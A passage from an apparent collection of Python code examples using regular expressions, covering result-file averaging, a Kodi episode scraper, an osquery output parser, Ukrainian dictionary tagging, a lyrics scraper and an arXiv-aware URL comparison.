    row_list = []
    fd = open(result_file, "r")
    for eachLine in fd:
        if len(re.findall(ignore, eachLine)) == 0:
            if len(re.findall(column_mark, eachLine)) != 0 and not head_flag:
                column = 0
                _, row, eachLine = re.split(row_head, eachLine)
                for i in re.split("\s+", eachLine):
                    if i:
                        result_dict[i] = {}
                        column_list[column] = i
                        column += 1
                head_flag = True
            elif len(re.findall(column_mark, eachLine)) == 0:
                column = 0
                _, row, eachLine = re.split(row_head, eachLine)
                row_flag = False
                for i in row_list:
                    if row == i:
                        row_flag = True
                if row_flag is False:
                    row_list.append(row)
                    for i in result_dict:
                        result_dict[i][row] = []
                for i in re.split("\s+", eachLine):
                    if i:
                        result_dict[column_list[column]][row].append(i)
                        column += 1
    fd.close()
    # Calculate the average value
    average_list = {}
    for i in column_list:
        average_list[column_list[i]] = {}
        for j in row_list:
            average_list[column_list[i]][j] = {}
            check = result_dict[column_list[i]][j][0]
            if utils_misc.aton(check) or utils_misc.aton(check) == 0.0:
                count = 0
                for k in result_dict[column_list[i]][j]:
                    count += utils_misc.aton(k)
                average_list[column_list[i]][j] = "%.2f" % (count /
                                                            len(result_dict[column_list[i]][j]))

    return average_list
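A minimal runnable sketch of the row/column splitting that summary_up_result relies on; the sample lines and the row_head pattern are assumptions for illustration (re.split with one capturing group yields exactly three parts):

import re

row_head = r"(^\w+)"
header = "time cpu mem"
_, row, rest = re.split(row_head, header)
columns = [i for i in re.split(r"\s+", rest) if i]
print columns       # ['cpu', 'mem']

data_line = "1 10 20"
_, row, rest = re.split(row_head, data_line)
values = [i for i in re.split(r"\s+", rest) if i]
print row, values   # 1 ['10', '20']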
Example #26
def LISTEPISODES(tvshowname,url):
    link=main.OPENURL(url)
    link=link.replace('\r','').replace('\n','').replace('\t','').replace('&nbsp;','')
    match = re.findall('<a class=".+?" href="(.+?)" id=".+?">(.+?)</a>',link)
    dialogWait = xbmcgui.DialogProgress()
    ret = dialogWait.create('Please wait until ['+tvshowname+'] Episodes are cached.')
    totalLinks = len(match)
    loadedLinks = 0
    remaining_display = 'Episodes loaded :: [B]'+str(loadedLinks)+' / '+str(totalLinks)+'[/B].'
    dialogWait.update(0, '[B]Will load instantly from now on[/B]',remaining_display)
    xbmc.executebuiltin("XBMC.Dialog.Close(busydialog,true)")
    for url,name in match:
        if "Online" not in name: continue
        name=name.replace(tvshowname,'').replace('Watch Online','')
        name=main.removeNonASCII(name)
        main.addTVInfo(name,MainUrl+url,39,'','','') 
        loadedLinks = loadedLinks + 1
        percent = (loadedLinks * 100)/totalLinks
        remaining_display = 'Episodes loaded :: [B]'+str(loadedLinks)+' / '+str(totalLinks)+'[/B].'
        dialogWait.update(percent,'[B]Will load instantly from now on[/B]',remaining_display)
        if dialogWait.iscanceled(): return False   
    match=re.findall('<div id="above_threadlist" class="above_threadlist">(.+?)</div>',link)
    for string in match:
        match1=re.findall('<a href="(.+?)" title="(.+?)">[0-9]+</a>', string)
        for url, page in match1:
            main.addTVInfo(page,MainUrl+url,38,'','','')
    dialogWait.close()
    del dialogWait
    xbmcplugin.setContent(int(sys.argv[1]), 'TV Shows')
    main.VIEWS()
Example #27
    def run_query(self, query):
        '''Run a query, returning the results as a list of dictionaries

        When unknown output is encountered, OsqueryUnknownException is thrown.
        When osqueryi returns an error, OsqueryException is thrown.
        '''
        query = query + ';'  # Extra semicolon causes no harm
        result = self.run_command(query)
        # On Mac, the query appears first in the string. Remove it if so.
        result = re.sub(re.escape(query), '', result).strip()
        result_lines = result.splitlines()

        if len(result_lines) < 1:
            raise OsqueryUnknownException(
                'Unexpected output:\n %s' % result_lines)
        if result_lines[0].startswith(self.ERROR_PREFIX):
            raise OsqueryException(result_lines[0])

        try:
            header = result_lines[1]
            columns = re.findall('[^ |]+', header)
            rows = []
            for line in result_lines[3:-1]:
                values = re.findall('[^ |]+', line)
                rows.append(
                    dict((col, val) for col, val in zip(columns, values)))
            return rows
        except:
            raise OsqueryUnknownException(
                'Unexpected output:\n %s' % result_lines)
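A runnable sketch of the header/row parsing performed above, applied to a sample osqueryi-style ASCII table (the table text is an assumption for illustration):

import re

sample = """+-----+----------+
| pid | name     |
+-----+----------+
| 1   | launchd  |
| 50  | syslogd  |
+-----+----------+"""
result_lines = sample.splitlines()
columns = re.findall('[^ |]+', result_lines[1])   # ['pid', 'name']
rows = [dict(zip(columns, re.findall('[^ |]+', line))) for line in result_lines[3:-1]]
print rows   # e.g. [{'pid': '1', 'name': 'launchd'}, {'pid': '50', 'name': 'syslogd'}]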
Example #28
def process_line_exceptions(line, extra_tags):
    global except_base_tag

    if not ' ' in line or re.match('.*[а-яіїєґ]/.*', line):
      return line
    if re.match('^[^ ]+ [^ ]+ [^:]?[a-z].*$', line):
      return line

    if line.startswith('# !'):
      except_base_tag = re.findall('![a-z:-]+', line)[0][1:] + ':'
      return ''
    
    base = re.findall('^[^ ]+', line)[0]
    
    except_base_tag2 = except_base_tag
    if base.endswith('ся'):
        except_base_tag2 = except_base_tag.replace('verb:', 'verb:rev:')
      
    out_line = re.sub('([^ ]+) ?', '\\1 ' + base + ' ' + except_base_tag2 + 'unknown' + extra_tags + '\n', line)
    
    if except_base_tag in ('verb:imperf:', 'verb:perf:'):
      base_add = 'inf:'
#      if base.endswith('ся'):
#        base_add = 'rev:' + base_add
      out_line = re.sub("(verb:(?:rev:)?)((im)?perf:)", "\\1inf:\\2", out_line, 1)
      
      out_lines = out_line.split('\n')
      out_lines[0] = out_lines[0].replace(':unknown', '')
      out_line = '\n'.join(out_lines)
    
    return out_line[:-1]
Example #29
def update_lyrics(request):  
    b = open('./artistList.txt', 'r') 
    bb = b.read()
    b.close() 
    bbb = bb.split(chr(10))

    for ar in bbb: 
        if ar.split('=')[1] == '1':
            return index(request)

        furl = "/"+ar.split('=')[1]+".htm"
        ar = ar.split('=')[0]
        artxt = ''
        
        #req = urllib2.Request(u"http://mojim.com/"+ar+".html?t1")
        #print "connected >> http://mojim.com/"+ar+".html?t1"
        #response = urllib2.urlopen(req) 
        #result = response.read()     
        print '--',furl,'--'

        if len(furl) > 0:           
            req2 = urllib2.Request("http://mojim.com"+furl) 


            response2 = urllib2.urlopen(req2)
            result2 = response2.read()     
            
            furl2 = re.findall('/tw[0-9x]*.htm', result2)
            iii = -1
            if len(furl2) > 0:        
                for furl3 in furl2: 
                    iii = iii + 1
                    if iii % 2 == 0: continue
                    try: 
                        req3 = urllib2.Request("http://mojim.com"+furl3) 
                        
                        response3 = urllib2.urlopen(req3)
                        result3 = response3.read()   
                        
                        lasturl = re.findall('<dl><dt><br /><br />[^^]*</div>', result3)
                        #a = raw_input()
                        artxt = lasturl[0].replace('更多更詳盡歌詞','').replace(u'在 ','').replace(u'Mojim.com','').replace(u'※','').replace('魔鏡歌詞網','')
  
                        aaaaaaaa = re.findall(u'title="歌詞(.*)">', artxt)
                        bbbbbbbb = re.findall('<dd><br />(.*)</dd>', artxt) 
     
                        bCnt = len(bbbbbbbb)
                        for bi in range(0, bCnt): 
                            if len(bbbbbbbb[bi]) > 22: 
                                lv = LyricsView()
                                ll = striphtml(bbbbbbbb[bi].encode('Shift_JIS').replace('<br />', '\r'))
                                ll = ll[:len(ll)-24]
                                lv.setParams({'artist':ar,'title':aaaaaaaa[bi],'lyrics':ll})
                                lv.save() 
                    except:
                        pass
        '''a = open(u''+ar+'.html', 'w')
        a.write(artxt)
        a.close()'''
    return index(request)
Example #30
def same_url(raw_url1, raw_url2):
    """Check if 2 URLs refer to the same primary resource

    `urltools.compare()` fails if the 2 URLs have different fragments.
    See issue #8 for details. The function treats a special case where
    the path is simply '/blog' to accommodate some blogs that refer to
    their posts via the fragment.

    Args:
        url1 (str): First URL to be compared
        url2 (str): Second URL

    Returns:
        bool: Whether the URLs are the same
    """
    arxiv_exception = 'arxiv.org'
    fragment_identifier = '#'

    url1 = _parse_url(raw_url1)
    url2 = _parse_url(raw_url2)

    # If it's on arxiv, do some acrobatics
    if url1['netloc'] == url2['netloc'] == arxiv_exception:
        regex = '([^/a-z]+\.[^/a-z.]+)'
        return re.findall(regex, url1['path']) == re.findall(regex, url2['path'])
    else:
        return urltools.compare(_normalize_url(raw_url1), _normalize_url(raw_url2))
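A minimal sketch of the arXiv path comparison above; the URLs are illustrative assumptions, and _parse_url, _normalize_url and urltools are not shown in this snippet, so only the regex step is reproduced:

import re

regex = '([^/a-z]+\.[^/a-z.]+)'
path1 = '/abs/1706.03762'
path2 = '/pdf/1706.03762v5'
print re.findall(regex, path1)   # ['1706.03762']
print re.findall(regex, path2)   # ['1706.03762']  -> treated as the same paper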